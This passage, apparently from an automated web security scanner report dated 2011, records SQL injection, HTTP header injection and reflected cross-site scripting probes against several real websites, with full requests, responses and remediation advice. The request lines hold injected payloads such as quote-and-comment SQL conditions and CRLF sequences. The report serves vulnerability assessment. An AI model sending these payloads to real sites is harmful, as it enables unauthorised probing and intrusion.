The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
Request 1
GET /rsrc.php/yb/r/oe16nW8etrA.js'%20and%201%3d1--%20 HTTP/1.1
Host: b.static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found
Content-Length: 7
Content-Type: text/html; charset=utf-8
Pragma:
X-Bad-Checksum: yb
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Tue, 01 Feb 2011 22:31:40 GMT
Date: Mon, 31 Jan 2011 22:31:40 GMT
Connection: close
/*bcs*/
Request 2
GET /rsrc.php/yb/r/oe16nW8etrA.js'%20and%201%3d2--%20 HTTP/1.1
Host: b.static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 403 Forbidden
X-FATAL-REQUEST: b.static.ak.fbcdn.net
Content-Type: text/html; charset=utf-8
X-Cnection: close
Content-Length: 0
Vary: Accept-Encoding
Expires: Mon, 31 Jan 2011 22:31:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 31 Jan 2011 22:31:40 GMT
Connection: close
2. HTTP header injection
There are 3 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
2.1. http://533.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://533.xg4ken.com
Path:
/media/redir.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload c3535%0d%0af2d4ce06a4e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=3&camp=890&affcode=cr3120099&cid=6722156085|41438|spa%20deals&mType=&networkType=content&url[]=http%3A%2F%2Fwww.groupon.com%3Futm_source%3DGoogle%26utm_medium%3Dcpc%26utm_campaign%3DContent%26d%3DNational_Content%26g%3DSpa_-_Deals%26utm_term%3Dspa%20deals%26p%3Dmail.google.com%26a%3DText%26k_clickID%3D_kenshoo_clickid_&c3535%0d%0af2d4ce06a4e=1 HTTP/1.1
Host: 533.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Tue, 01 Feb 2011 01:43:42 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=4022230d-a26e-8d88-d321-00001d61caa4; expires=Mon, 02-May-2011 01:43:42 GMT; path=/; domain=.xg4ken.com
Location: http://www.groupon.com?utm_source=Google&utm_medium=cpc&utm_campaign=Content&d=National_Content&g=Spa_-_Deals&utm_term=spa deals&p=mail.google.com&a=Text&k_clickID=4022230d-a26e-8d88-d321-00001d61caa4&c3535
f2d4ce06a4e=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The value of the url[] request parameter is copied into the Location response header. The payload 9edff%0d%0ab2fe8e7e43e was submitted in the url[] parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=3&camp=890&affcode=cr3120099&cid=6722156085|41438|spa%20deals&mType=&networkType=content&url[]=http%3A%2F%2Fwww.groupon.com%3Futm_source%3DGoogle%26utm_medium%3Dcpc%26utm_campaign%3DContent%26d%3DNational_Content%26g%3DSpa_-_Deals%26utm_term%3Dspa%20deals%26p%3Dmail.google.com%26a%3DText%26k_clickID%3D_kenshoo_clickid_9edff%0d%0ab2fe8e7e43e HTTP/1.1
Host: 533.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Mon, 31 Jan 2011 02:55:13 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=39b78f33-9e98-20a9-8339-0000787da17f; expires=Sun, 01-May-2011 02:55:13 GMT; path=/; domain=.xg4ken.com
Location: http://www.groupon.com?utm_source=Google&utm_medium=cpc&utm_campaign=Content&d=National_Content&g=Spa_-_Deals&utm_term=spa deals&p=mail.google.com&a=Text&k_clickID=39b78f33-9e98-20a9-8339-0000787da17f9edff
b2fe8e7e43e
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The value of REST URL parameter 2 is copied into the Location response header. The payload 5cfdc%0d%0a0b11d3a2ea9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /deals/socialads_reflector5cfdc%0d%0a0b11d3a2ea9 HTTP/1.1
Host: livingsocial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 31 Jan 2011 02:58:56 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: http://partners.livingsocial.com/deals/socialads_reflector5cfdc
0b11d3a2ea9

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>
3. Cross-site scripting (reflected)
There are 95 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ba71'%3bf1e47d0dfa was submitted in the REST URL parameter 2. This input was echoed as 5ba71';f1e47d0dfa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940925ba71'%3bf1e47d0dfa/Article_2011-01-29-Comcast%20NBC/id-5c0db4c644554731b788461e4d1c7384 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 18:32:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67098
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940925ba71';f1e47d0dfa/id-5c0db4c644554731b788461e4d1c7384'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dd9b'%3b93992f719ae was submitted in the REST URL parameter 2. This input was echoed as 8dd9b';93992f719ae in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940928dd9b'%3b93992f719ae/Article_2011-01-29-Music%20In%20Schools/id-37ae6ea76f3a489f9e545a72aec815f1 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86390
Date: Sun, 30 Jan 2011 18:32:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65562
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940928dd9b';93992f719ae/id-37ae6ea76f3a489f9e545a72aec815f1'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7fd17'%3b5c6377d3093 was submitted in the REST URL parameter 2. This input was echoed as 7fd17';5c6377d3093 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940927fd17'%3b5c6377d3093/Article_2011-01-29-Obit%20Babbitt/id-f2ca249bac914a0091f0cd72a15ed3fe HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 18:32:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59674
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940927fd17';5c6377d3093/id-f2ca249bac914a0091f0cd72a15ed3fe'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8b36'%3b4ece5fa1576 was submitted in the REST URL parameter 2. This input was echoed as b8b36';4ece5fa1576 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092b8b36'%3b4ece5fa1576/Article_2011-01-29-Obit%20David%20Frye/id-70e19413e11241018ba03dcc13085098 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 18:32:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59975
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092b8b36';4ece5fa1576/id-70e19413e11241018ba03dcc13085098'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb6ae'%3b4828b38e5f2 was submitted in the REST URL parameter 2. This input was echoed as bb6ae';4828b38e5f2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092bb6ae'%3b4828b38e5f2/Article_2011-01-29-People%20Chris%20Brown/id-8595155a6ad643128619d3de36a7f0a8 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86358
Date: Sun, 30 Jan 2011 18:32:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64598
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092bb6ae';4828b38e5f2/id-8595155a6ad643128619d3de36a7f0a8'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a8f3'%3b049df0e7958 was submitted in the REST URL parameter 2. This input was echoed as 9a8f3';049df0e7958 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940929a8f3'%3b049df0e7958/Article_2011-01-30-ABC%20Amanpour/id-7b493e6f40cf48d4bdbcee931b98f8ba HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86377
Date: Mon, 31 Jan 2011 02:59:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64231
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940929a8f3';049df0e7958/id-7b493e6f40cf48d4bdbcee931b98f8ba'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ec54'%3b71b3d9d3cdd was submitted in the REST URL parameter 2. This input was echoed as 1ec54';71b3d9d3cdd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940921ec54'%3b71b3d9d3cdd/Article_2011-01-30-Awards/id-011fe4db06e447ae8d981d77dadaa359 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Mon, 31 Jan 2011 02:59:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67569
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940921ec54';71b3d9d3cdd/id-011fe4db06e447ae8d981d77dadaa359'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9b7a'%3b4197b723f8f was submitted in the REST URL parameter 2. This input was echoed as d9b7a';4197b723f8f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092d9b7a'%3b4197b723f8f/Article_2011-01-30-Awards/id-3900b15cae5b41bf95c0328a35f712a4 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 18:32:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60979
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092d9b7a';4197b723f8f/id-3900b15cae5b41bf95c0328a35f712a4'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98a74'%3bb06d726fa4a was submitted in the REST URL parameter 2. This input was echoed as 98a74';b06d726fa4a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b2141609409298a74'%3bb06d726fa4a/Article_2011-01-30-Awards/id-4ec4262c596c4dc398bd498866494285 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Tue, 01 Feb 2011 02:39:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66432
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b2141609409298a74';b06d726fa4a/id-4ec4262c596c4dc398bd498866494285'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bb90'%3b448814ce715 was submitted in the REST URL parameter 2. This input was echoed as 8bb90';448814ce715 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940928bb90'%3b448814ce715/Article_2011-01-30-Awards/id-6a08f1abbeb54af69cb1816d8a39180b HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86356
Date: Mon, 31 Jan 2011 02:59:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 68076
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
